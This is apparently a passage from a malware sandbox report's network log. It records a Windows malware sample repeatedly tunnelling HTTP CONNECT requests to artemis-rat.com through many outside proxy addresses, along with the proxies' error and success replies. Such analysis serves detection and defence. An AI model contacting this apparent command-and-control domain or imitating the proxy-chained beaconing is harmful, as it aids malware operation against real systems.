                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              516192.168.2.45152545.11.95.16560107284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:19.197732925 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              517192.168.2.451319117.160.250.13488997284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:19.198230028 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:19.791157961 CET303INHTTP/1.1 400 Bad Request
                                              Server: openresty
                                              Date: Mon, 11 Mar 2024 07:37:19 GMT
                                              Content-Type: text/html
                                              Content-Length: 154
                                              Connection: close
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              518192.168.2.450893159.223.166.21474607284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:19.200012922 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:22.366300106 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:25.366719961 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:31.460194111 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:43.553858995 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:38:07.631839991 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:38:55.631865025 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              519192.168.2.450880207.180.198.241172287284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:19.206687927 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              520192.168.2.451584184.178.172.2341457284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:19.209096909 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              521192.168.2.45158372.195.34.35273607284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:19.210458040 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              522192.168.2.450919198.12.253.1627627284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:19.218887091 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:22.366517067 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              523192.168.2.45156282.165.105.48807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:19.223305941 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:39.931659937 CET705INHTTP/1.1 500 Internal Server Error
                                              Date: Mon, 11 Mar 2024 07:37:39 GMT
                                              Server: Apache
                                              Content-Length: 529
                                              Connection: close
                                              Content-Type: text/html; charset=iso-8859-1
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 73 65 72 76 65 72 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 61 6e 20 69 6e 74 65 72 6e 61 6c 20 65 72 72 6f 72 20 6f 72 0a 6d 69 73 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 61 6e 64 20 77 61 73 20 75 6e 61 62 6c 65 20 74 6f 20 63 6f 6d 70 6c 65 74 65 0a 79 6f 75 72 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 70 3e 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 74 68 65 20 73 65 72 76 65 72 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 61 74 20 0a 20 69 6e 66 6f 40 6e 65 77 76 6f 69 63 65 2e 63 68 20 74 6f 20 69 6e 66 6f 72 6d 20 74 68 65 6d 20 6f 66 20 74 68 65 20 74 69 6d 65 20 74 68 69 73 20 65 72 72 6f 72 20 6f 63 63 75 72 72 65 64 2c 0a 20 61 6e 64 20 74 68 65 20 61 63 74 69 6f 6e 73 20 79 6f 75 20 70 65 72 66 6f 72 6d 65 64 20 6a 75 73 74 20 62 65 66 6f 72 65 20 74 68 69 73 20 65 72 72 6f 72 2e 3c 2f 70 3e 0a 3c 70 3e 4d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 61 62 6f 75 74 20 74 68 69 73 20 65 72 72 6f 72 20 6d 61 79 20 62 65 20 61 76 61 69 6c 61 62 6c 65 0a 69 6e 20 74 68 65 20 73 65 72 76 65 72 20 65 72 72 6f 72 20 6c 6f 67 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator at info@newvoice.ch to inform them of the time this error occurred, and the actions you performed just before this error.</p><p>More information about this error may be availablein the server error log.</p></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              524192.168.2.451597159.65.77.16885857284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:19.233552933 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:19.404632092 CET311INHTTP/1.1 400 Bad Request
                                              Server: nginx
                                              Date: Mon, 11 Mar 2024 07:37:20 GMT
                                              Content-Type: text/html
                                              Content-Length: 166
                                              Connection: close
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              525192.168.2.451571119.196.168.183807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:19.235404015 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:19.537421942 CET166INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              526192.168.2.45173443.134.230.1274437284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:19.236170053 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              527192.168.2.45173943.134.230.1274437284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:19.237557888 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              528192.168.2.45174343.134.230.1274437284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:19.238552094 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              529192.168.2.451572121.159.146.251807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:19.239027977 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              530192.168.2.451606172.67.182.150807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:19.274884939 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:19.428899050 CET316INHTTP/1.1 400 Bad Request
                                              Server: cloudflare
                                              Date: Mon, 11 Mar 2024 07:37:19 GMT
                                              Content-Type: text/html
                                              Content-Length: 155
                                              Connection: close
                                              CF-RAY: -
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              531192.168.2.45174543.157.47.74437284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:19.275023937 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              532192.168.2.451557200.43.231.441537284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:19.275690079 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              533192.168.2.45087151.161.131.84437127284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:19.276803970 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:22.367373943 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:25.570147991 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              534192.168.2.450947174.77.111.19741457284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:19.277174950 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              535192.168.2.45078958.84.20.1880807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:19.277422905 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:22.366437912 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:27.374747038 CET39INHTTP/1.1 200 Connection established


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              536192.168.2.45174743.134.230.1274437284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:19.279711008 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              537192.168.2.45175343.157.47.74437284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:19.285002947 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              538192.168.2.451634172.67.182.22807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:19.285007000 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:19.439239025 CET316INHTTP/1.1 400 Bad Request
                                              Server: cloudflare
                                              Date: Mon, 11 Mar 2024 07:37:19 GMT
                                              Content-Type: text/html
                                              Content-Length: 155
                                              Connection: close
                                              CF-RAY: -
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              539192.168.2.451635203.24.103.8807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:19.285840988 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:19.440244913 CET316INHTTP/1.1 400 Bad Request
                                              Server: cloudflare
                                              Date: Mon, 11 Mar 2024 07:37:19 GMT
                                              Content-Type: text/html
                                              Content-Length: 155
                                              Connection: close
                                              CF-RAY: -
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              540192.168.2.451600162.243.102.20797647284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:19.291392088 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              541192.168.2.451591184.181.217.20141457284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:19.300390959 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              542192.168.2.45179243.157.47.74437284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:19.301183939 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              543192.168.2.4511865.161.231.34807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:19.303845882 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:20.663276911 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:23.054085970 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
